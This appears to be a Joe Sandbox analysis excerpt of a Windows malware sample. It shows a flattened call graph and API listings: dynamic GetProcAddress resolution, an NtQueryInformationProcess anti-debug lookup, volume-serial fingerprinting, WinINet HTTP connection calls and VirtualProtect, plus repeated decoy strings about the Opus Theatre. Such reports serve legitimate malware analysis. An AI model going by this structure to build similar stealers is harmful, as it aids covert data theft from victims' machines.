14283 c53bcc 14282->14283 14284 c545c0 2 API calls 14283->14284 14285 c53be5 14284->14285 14286 c545c0 2 API calls 14285->14286 14287 c53bfe 14286->14287 14288 c545c0 2 API calls 14287->14288 14289 c53c17 14288->14289 14290 c545c0 2 API calls 14289->14290 14291 c53c30 14290->14291 14292 c545c0 2 API calls 14291->14292 14293 c53c49 14292->14293 14294 c545c0 2 API calls 14293->14294 14295 c53c62 14294->14295 14296 c545c0 2 API calls 14295->14296 14297 c53c7b 14296->14297 14298 c545c0 2 API calls 14297->14298 14299 c53c94 14298->14299 14300 c545c0 2 API calls 14299->14300 14301 c53cad 14300->14301 14302 c545c0 2 API calls 14301->14302 14303 c53cc6 14302->14303 14304 c545c0 2 API calls 14303->14304 14305 c53cdf 14304->14305 14306 c545c0 2 API calls 14305->14306 14307 c53cf8 14306->14307 14308 c545c0 2 API calls 14307->14308 14309 c53d11 14308->14309 14310 c545c0 2 API calls 14309->14310 14311 c53d2a 14310->14311 14312 c545c0 2 API calls 14311->14312 14313 c53d43 14312->14313 14314 c545c0 2 API calls 14313->14314 14315 c53d5c 14314->14315 14316 c545c0 2 API calls 14315->14316 14317 c53d75 14316->14317 14318 c545c0 2 API calls 14317->14318 14319 c53d8e 14318->14319 14320 c545c0 2 API calls 14319->14320 14321 c53da7 14320->14321 14322 c545c0 2 API calls 14321->14322 14323 c53dc0 14322->14323 14324 c545c0 2 API calls 14323->14324 14325 c53dd9 14324->14325 14326 c545c0 2 API calls 14325->14326 14327 c53df2 14326->14327 14328 c545c0 2 API calls 14327->14328 14329 c53e0b 14328->14329 14330 c545c0 2 API calls 14329->14330 14331 c53e24 14330->14331 14332 c545c0 2 API calls 14331->14332 14333 c53e3d 14332->14333 14334 c545c0 2 API calls 14333->14334 14335 c53e56 14334->14335 14336 c545c0 2 API calls 14335->14336 14337 c53e6f 14336->14337 14338 c545c0 2 API calls 14337->14338 14339 c53e88 14338->14339 14340 c545c0 2 API calls 14339->14340 14341 c53ea1 14340->14341 14342 c545c0 2 API calls 14341->14342 14343 c53eba 14342->14343 14344 c545c0 2 API calls 14343->14344 14345 c53ed3 
14344->14345 14346 c545c0 2 API calls 14345->14346 14347 c53eec 14346->14347 14348 c545c0 2 API calls 14347->14348 14349 c53f05 14348->14349 14350 c545c0 2 API calls 14349->14350 14351 c53f1e 14350->14351 14352 c545c0 2 API calls 14351->14352 14353 c53f37 14352->14353 14354 c545c0 2 API calls 14353->14354 14355 c53f50 14354->14355 14356 c545c0 2 API calls 14355->14356 14357 c53f69 14356->14357 14358 c545c0 2 API calls 14357->14358 14359 c53f82 14358->14359 14360 c545c0 2 API calls 14359->14360 14361 c53f9b 14360->14361 14362 c545c0 2 API calls 14361->14362 14363 c53fb4 14362->14363 14364 c545c0 2 API calls 14363->14364 14365 c53fcd 14364->14365 14366 c545c0 2 API calls 14365->14366 14367 c53fe6 14366->14367 14368 c545c0 2 API calls 14367->14368 14369 c53fff 14368->14369 14370 c545c0 2 API calls 14369->14370 14371 c54018 14370->14371 14372 c545c0 2 API calls 14371->14372 14373 c54031 14372->14373 14374 c545c0 2 API calls 14373->14374 14375 c5404a 14374->14375 14376 c545c0 2 API calls 14375->14376 14377 c54063 14376->14377 14378 c545c0 2 API calls 14377->14378 14379 c5407c 14378->14379 14380 c545c0 2 API calls 14379->14380 14381 c54095 14380->14381 14382 c545c0 2 API calls 14381->14382 14383 c540ae 14382->14383 14384 c545c0 2 API calls 14383->14384 14385 c540c7 14384->14385 14386 c545c0 2 API calls 14385->14386 14387 c540e0 14386->14387 14388 c545c0 2 API calls 14387->14388 14389 c540f9 14388->14389 14390 c545c0 2 API calls 14389->14390 14391 c54112 14390->14391 14392 c545c0 2 API calls 14391->14392 14393 c5412b 14392->14393 14394 c545c0 2 API calls 14393->14394 14395 c54144 14394->14395 14396 c545c0 2 API calls 14395->14396 14397 c5415d 14396->14397 14398 c545c0 2 API calls 14397->14398 14399 c54176 14398->14399 14400 c545c0 2 API calls 14399->14400 14401 c5418f 14400->14401 14402 c545c0 2 API calls 14401->14402 14403 c541a8 14402->14403 14404 c545c0 2 API calls 14403->14404 14405 c541c1 14404->14405 14406 c545c0 2 API calls 14405->14406 14407 c541da 14406->14407 
14408 c545c0 2 API calls 14407->14408 14409 c541f3 14408->14409 14410 c545c0 2 API calls 14409->14410 14411 c5420c 14410->14411 14412 c545c0 2 API calls 14411->14412 14413 c54225 14412->14413 14414 c545c0 2 API calls 14413->14414 14415 c5423e 14414->14415 14416 c545c0 2 API calls 14415->14416 14417 c54257 14416->14417 14418 c545c0 2 API calls 14417->14418 14419 c54270 14418->14419 14420 c545c0 2 API calls 14419->14420 14421 c54289 14420->14421 14422 c545c0 2 API calls 14421->14422 14423 c542a2 14422->14423 14424 c545c0 2 API calls 14423->14424 14425 c542bb 14424->14425 14426 c545c0 2 API calls 14425->14426 14427 c542d4 14426->14427 14428 c545c0 2 API calls 14427->14428 14429 c542ed 14428->14429 14430 c545c0 2 API calls 14429->14430 14431 c54306 14430->14431 14432 c545c0 2 API calls 14431->14432 14433 c5431f 14432->14433 14434 c545c0 2 API calls 14433->14434 14435 c54338 14434->14435 14436 c545c0 2 API calls 14435->14436 14437 c54351 14436->14437 14438 c545c0 2 API calls 14437->14438 14439 c5436a 14438->14439 14440 c545c0 2 API calls 14439->14440 14441 c54383 14440->14441 14442 c545c0 2 API calls 14441->14442 14443 c5439c 14442->14443 14444 c545c0 2 API calls 14443->14444 14445 c543b5 14444->14445 14446 c545c0 2 API calls 14445->14446 14447 c543ce 14446->14447 14448 c545c0 2 API calls 14447->14448 14449 c543e7 14448->14449 14450 c545c0 2 API calls 14449->14450 14451 c54400 14450->14451 14452 c545c0 2 API calls 14451->14452 14453 c54419 14452->14453 14454 c545c0 2 API calls 14453->14454 14455 c54432 14454->14455 14456 c545c0 2 API calls 14455->14456 14457 c5444b 14456->14457 14458 c545c0 2 API calls 14457->14458 14459 c54464 14458->14459 14460 c545c0 2 API calls 14459->14460 14461 c5447d 14460->14461 14462 c545c0 2 API calls 14461->14462 14463 c54496 14462->14463 14464 c545c0 2 API calls 14463->14464 14465 c544af 14464->14465 14466 c545c0 2 API calls 14465->14466 14467 c544c8 14466->14467 14468 c545c0 2 API calls 14467->14468 14469 c544e1 14468->14469 14470 c545c0 2 
API calls 14469->14470 14471 c544fa 14470->14471 14472 c545c0 2 API calls 14471->14472 14473 c54513 14472->14473 14474 c545c0 2 API calls 14473->14474 14475 c5452c 14474->14475 14476 c545c0 2 API calls 14475->14476 14477 c54545 14476->14477 14478 c545c0 2 API calls 14477->14478 14479 c5455e 14478->14479 14480 c545c0 2 API calls 14479->14480 14481 c54577 14480->14481 14482 c545c0 2 API calls 14481->14482 14483 c54590 14482->14483 14484 c545c0 2 API calls 14483->14484 14485 c545a9 14484->14485 14486 c69c10 14485->14486 14487 c6a036 8 API calls 14486->14487 14488 c69c20 43 API calls 14486->14488 14489 c6a146 14487->14489 14490 c6a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14487->14490 14488->14487 14491 c6a216 14489->14491 14492 c6a153 8 API calls 14489->14492 14490->14489 14493 c6a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14491->14493 14494 c6a298 14491->14494 14492->14491 14493->14494 14495 c6a337 14494->14495 14496 c6a2a5 6 API calls 14494->14496 14497 c6a344 9 API calls 14495->14497 14498 c6a41f 14495->14498 14496->14495 14497->14498 14499 c6a4a2 14498->14499 14500 c6a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14498->14500 14501 c6a4dc 14499->14501 14502 c6a4ab GetProcAddress GetProcAddress 14499->14502 14500->14499 14503 c6a515 14501->14503 14504 c6a4e5 GetProcAddress GetProcAddress 14501->14504 14502->14501 14505 c6a612 14503->14505 14506 c6a522 10 API calls 14503->14506 14504->14503 14507 c6a67d 14505->14507 14508 c6a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14505->14508 14506->14505 14509 c6a686 GetProcAddress 14507->14509 14510 c6a69e 14507->14510 14508->14507 14509->14510 14511 c6a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14510->14511 14512 c65ca3 14510->14512 14511->14512 14513 c51590 14512->14513 15634 c51670 14513->15634 14516 c6a7a0 lstrcpy 14517 c515b5 14516->14517 14518 c6a7a0 lstrcpy 14517->14518 
14519 c515c7 14518->14519 14520 c6a7a0 lstrcpy 14519->14520 14521 c515d9 14520->14521 14522 c6a7a0 lstrcpy 14521->14522 14523 c51663 14522->14523 14524 c65510 14523->14524 14525 c65521 14524->14525 14526 c6a820 2 API calls 14525->14526 14527 c6552e 14526->14527 14528 c6a820 2 API calls 14527->14528 14529 c6553b 14528->14529 14530 c6a820 2 API calls 14529->14530 14531 c65548 14530->14531 14532 c6a740 lstrcpy 14531->14532 14533 c65555 14532->14533 14534 c6a740 lstrcpy 14533->14534 14535 c65562 14534->14535 14536 c6a740 lstrcpy 14535->14536 14537 c6556f 14536->14537 14538 c6a740 lstrcpy 14537->14538 14578 c6557c 14538->14578 14539 c6a740 lstrcpy 14539->14578 14540 c6a7a0 lstrcpy 14540->14578 14541 c65643 StrCmpCA 14541->14578 14542 c656a0 StrCmpCA 14543 c657dc 14542->14543 14542->14578 14544 c6a8a0 lstrcpy 14543->14544 14545 c657e8 14544->14545 14546 c6a820 2 API calls 14545->14546 14548 c657f6 14546->14548 14547 c6a820 lstrlen lstrcpy 14547->14578 14550 c6a820 2 API calls 14548->14550 14549 c65856 StrCmpCA 14551 c65991 14549->14551 14549->14578 14553 c65805 14550->14553 14552 c6a8a0 lstrcpy 14551->14552 14554 c6599d 14552->14554 14555 c51670 lstrcpy 14553->14555 14556 c6a820 2 API calls 14554->14556 14575 c65811 14555->14575 14557 c659ab 14556->14557 14560 c6a820 2 API calls 14557->14560 14558 c65a0b StrCmpCA 14561 c65a16 Sleep 14558->14561 14562 c65a28 14558->14562 14559 c652c0 25 API calls 14559->14578 14563 c659ba 14560->14563 14561->14578 14564 c6a8a0 lstrcpy 14562->14564 14566 c51670 lstrcpy 14563->14566 14567 c65a34 14564->14567 14565 c51590 lstrcpy 14565->14578 14566->14575 14568 c6a820 2 API calls 14567->14568 14569 c65a43 14568->14569 14570 c6a820 2 API calls 14569->14570 14571 c65a52 14570->14571 14574 c51670 lstrcpy 14571->14574 14572 c6a8a0 lstrcpy 14572->14578 14573 c6578a StrCmpCA 14573->14578 14574->14575 14575->13631 14576 c6593f StrCmpCA 14576->14578 14577 c651f0 20 API calls 14577->14578 14578->14539 14578->14540 14578->14541 14578->14542 
14578->14547 14578->14549 14578->14558 14578->14559 14578->14565 14578->14572 14578->14573 14578->14576 14578->14577 14580 c67553 GetVolumeInformationA 14579->14580 14581 c6754c 14579->14581 14582 c67591 14580->14582 14581->14580 14583 c675fc GetProcessHeap RtlAllocateHeap 14582->14583 14584 c67628 wsprintfA 14583->14584 14585 c67619 14583->14585 14587 c6a740 lstrcpy 14584->14587 14586 c6a740 lstrcpy 14585->14586 14588 c65da7 14586->14588 14587->14588 14588->13652 14590 c6a7a0 lstrcpy 14589->14590 14591 c54899 14590->14591 15643 c547b0 14591->15643 14593 c548a5 14594 c6a740 lstrcpy 14593->14594 14595 c548d7 14594->14595 14596 c6a740 lstrcpy 14595->14596 14597 c548e4 14596->14597 14598 c6a740 lstrcpy 14597->14598 14599 c548f1 14598->14599 14600 c6a740 lstrcpy 14599->14600 14601 c548fe 14600->14601 14602 c6a740 lstrcpy 14601->14602 14603 c5490b InternetOpenA StrCmpCA 14602->14603 14604 c54944 14603->14604 14605 c54ecb InternetCloseHandle 14604->14605 15649 c68b60 14604->15649 14606 c54ee8 14605->14606 15664 c59ac0 CryptStringToBinaryA 14606->15664 14608 c54963 15657 c6a920 14608->15657 14611 c54976 14613 c6a8a0 lstrcpy 14611->14613 14618 c5497f 14613->14618 14614 c6a820 2 API calls 14615 c54f05 14614->14615 14617 c6a9b0 4 API calls 14615->14617 14616 c54f27 codecvt 14620 c6a7a0 lstrcpy 14616->14620 14619 c54f1b 14617->14619 14622 c6a9b0 4 API calls 14618->14622 14621 c6a8a0 lstrcpy 14619->14621 14633 c54f57 14620->14633 14621->14616 14623 c549a9 14622->14623 14624 c6a8a0 lstrcpy 14623->14624 14625 c549b2 14624->14625 14626 c6a9b0 4 API calls 14625->14626 14627 c549d1 14626->14627 14628 c6a8a0 lstrcpy 14627->14628 14629 c549da 14628->14629 14630 c6a920 3 API calls 14629->14630 14631 c549f8 14630->14631 14632 c6a8a0 lstrcpy 14631->14632 14634 c54a01 14632->14634 14633->13655 14635 c6a9b0 4 API calls 14634->14635 14636 c54a20 14635->14636 14637 c6a8a0 lstrcpy 14636->14637 14638 c54a29 14637->14638 14639 c6a9b0 4 API calls 14638->14639 14640 c54a48 14639->14640 14641 
c6a8a0 lstrcpy 14640->14641 14642 c54a51 14641->14642 14643 c6a9b0 4 API calls 14642->14643 14644 c54a7d 14643->14644 14645 c6a920 3 API calls 14644->14645 14646 c54a84 14645->14646 14647 c6a8a0 lstrcpy 14646->14647 14648 c54a8d 14647->14648 14649 c54aa3 InternetConnectA 14648->14649 14649->14605 14650 c54ad3 HttpOpenRequestA 14649->14650 14652 c54ebe InternetCloseHandle 14650->14652 14653 c54b28 14650->14653 14652->14605 14654 c6a9b0 4 API calls 14653->14654 14655 c54b3c 14654->14655 14656 c6a8a0 lstrcpy 14655->14656 14657 c54b45 14656->14657 14658 c6a920 3 API calls 14657->14658 14659 c54b63 14658->14659 14660 c6a8a0 lstrcpy 14659->14660 14661 c54b6c 14660->14661 14662 c6a9b0 4 API calls 14661->14662 14663 c54b8b 14662->14663 14664 c6a8a0 lstrcpy 14663->14664 14665 c54b94 14664->14665 14666 c6a9b0 4 API calls 14665->14666 14667 c54bb5 14666->14667 14668 c6a8a0 lstrcpy 14667->14668 14669 c54bbe 14668->14669 14670 c6a9b0 4 API calls 14669->14670 14671 c54bde 14670->14671 14672 c6a8a0 lstrcpy 14671->14672 14673 c54be7 14672->14673 14674 c6a9b0 4 API calls 14673->14674 14675 c54c06 14674->14675 14676 c6a8a0 lstrcpy 14675->14676 14677 c54c0f 14676->14677 14678 c6a920 3 API calls 14677->14678 14679 c54c2d 14678->14679 14680 c6a8a0 lstrcpy 14679->14680 14681 c54c36 14680->14681 14682 c6a9b0 4 API calls 14681->14682 14683 c54c55 14682->14683 14684 c6a8a0 lstrcpy 14683->14684 14685 c54c5e 14684->14685 14686 c6a9b0 4 API calls 14685->14686 14687 c54c7d 14686->14687 14688 c6a8a0 lstrcpy 14687->14688 14689 c54c86 14688->14689 14690 c6a920 3 API calls 14689->14690 14691 c54ca4 14690->14691 14692 c6a8a0 lstrcpy 14691->14692 14693 c54cad 14692->14693 14694 c6a9b0 4 API calls 14693->14694 14695 c54ccc 14694->14695 14696 c6a8a0 lstrcpy 14695->14696 14697 c54cd5 14696->14697 14698 c6a9b0 4 API calls 14697->14698 14699 c54cf6 14698->14699 14700 c6a8a0 lstrcpy 14699->14700 14701 c54cff 14700->14701 14702 c6a9b0 4 API calls 14701->14702 14703 c54d1f 14702->14703 14704 c6a8a0 lstrcpy 

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(74DD0000,007F24B8), ref: 00C698A1
                              • GetProcAddress.KERNEL32(74DD0000,007F2410), ref: 00C698BA
                              • GetProcAddress.KERNEL32(74DD0000,007F2458), ref: 00C698D2
                              • GetProcAddress.KERNEL32(74DD0000,007F2488), ref: 00C698EA
                              • GetProcAddress.KERNEL32(74DD0000,007F2500), ref: 00C69903
                              • GetProcAddress.KERNEL32(74DD0000,007F9288), ref: 00C6991B
                              • GetProcAddress.KERNEL32(74DD0000,007E5C50), ref: 00C69933
                              • GetProcAddress.KERNEL32(74DD0000,007E5D10), ref: 00C6994C
                              • GetProcAddress.KERNEL32(74DD0000,007F2230), ref: 00C69964
                              • GetProcAddress.KERNEL32(74DD0000,007F2278), ref: 00C6997C
                              • GetProcAddress.KERNEL32(74DD0000,007F2368), ref: 00C69995
                              • GetProcAddress.KERNEL32(74DD0000,007F2398), ref: 00C699AD
                              • GetProcAddress.KERNEL32(74DD0000,007E5E10), ref: 00C699C5
                              • GetProcAddress.KERNEL32(74DD0000,007F24A0), ref: 00C699DE
                              • GetProcAddress.KERNEL32(74DD0000,007F23B0), ref: 00C699F6
                              • GetProcAddress.KERNEL32(74DD0000,007E5C70), ref: 00C69A0E
                              • GetProcAddress.KERNEL32(74DD0000,007F23E0), ref: 00C69A27
                              • GetProcAddress.KERNEL32(74DD0000,007F23F8), ref: 00C69A3F
                              • GetProcAddress.KERNEL32(74DD0000,007E5C10), ref: 00C69A57
                              • GetProcAddress.KERNEL32(74DD0000,007F2428), ref: 00C69A70
                              • GetProcAddress.KERNEL32(74DD0000,007E5D30), ref: 00C69A88
                              • LoadLibraryA.KERNEL32(007F25C0,?,00C66A00), ref: 00C69A9A
                              • LoadLibraryA.KERNEL32(007F2530,?,00C66A00), ref: 00C69AAB
                              • LoadLibraryA.KERNEL32(007F2518,?,00C66A00), ref: 00C69ABD
                              • LoadLibraryA.KERNEL32(007F25D8,?,00C66A00), ref: 00C69ACF
                              • LoadLibraryA.KERNEL32(007F2548,?,00C66A00), ref: 00C69AE0
                              • GetProcAddress.KERNEL32(75A70000,007F2560), ref: 00C69B02
                              • GetProcAddress.KERNEL32(75290000,007F2578), ref: 00C69B23
                              • GetProcAddress.KERNEL32(75290000,007F2590), ref: 00C69B3B
                              • GetProcAddress.KERNEL32(75BD0000,007F25A8), ref: 00C69B5D
                              • GetProcAddress.KERNEL32(75450000,007E5C30), ref: 00C69B7E
                              • GetProcAddress.KERNEL32(76E90000,007F92A8), ref: 00C69B9F
                              • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 00C69BB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: 0\~$0]~$NtQueryInformationProcess$P\~$p\~
                              • API String ID: 2238633743-2935435965

                              Control-flow Graph

                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00C5460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 00C5479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54770
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5462D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5477B
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54643
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54638
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545DD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54622
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5466D
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5474F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546B7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54683
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54734
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546C2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54617
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54713
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5475A
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54729
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54678
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546CD
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546AC
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5471E
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545D2
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545C7
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545E8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54765
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C546D8
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54657
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C54662
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C5473F
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 00C545F3
                              Memory Dump Source
                              • Source File: 00000000.00000002.1798722165.0000000000C51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C50000, based on PE: true
                               • Associated: 00000000.00000002.1798710835.0000000000C50000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D01000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D0D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000D32000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798722165.0000000000E9A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000000EAE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001040000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000112B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001152000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.000000000115B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1798849780.0000000001169000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799112151.000000000116A000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799226557.0000000001315000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.1799238668.0000000001316000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_c50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                               • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: df2fd8e7f87cacc7689b508c118c8e77ce00d1c3ad28ef9c498167c80b42a0c7
                              • Instruction ID: 9d240672b01a6e5116818a5bffa9969485fd493c23c027aec6278e1e946a0ef3
                              • Opcode Fuzzy Hash: df2fd8e7f87cacc7689b508c118c8e77ce00d1c3ad28ef9c498167c80b42a0c7
                              • Instruction Fuzzy Hash: 7D414B606C261C7AFE39F7A58842EBD77B2BFC2709F5090E4F80853282CBF275414526

                              Control-flow Graph

                              • Executed
                              • Not Executed
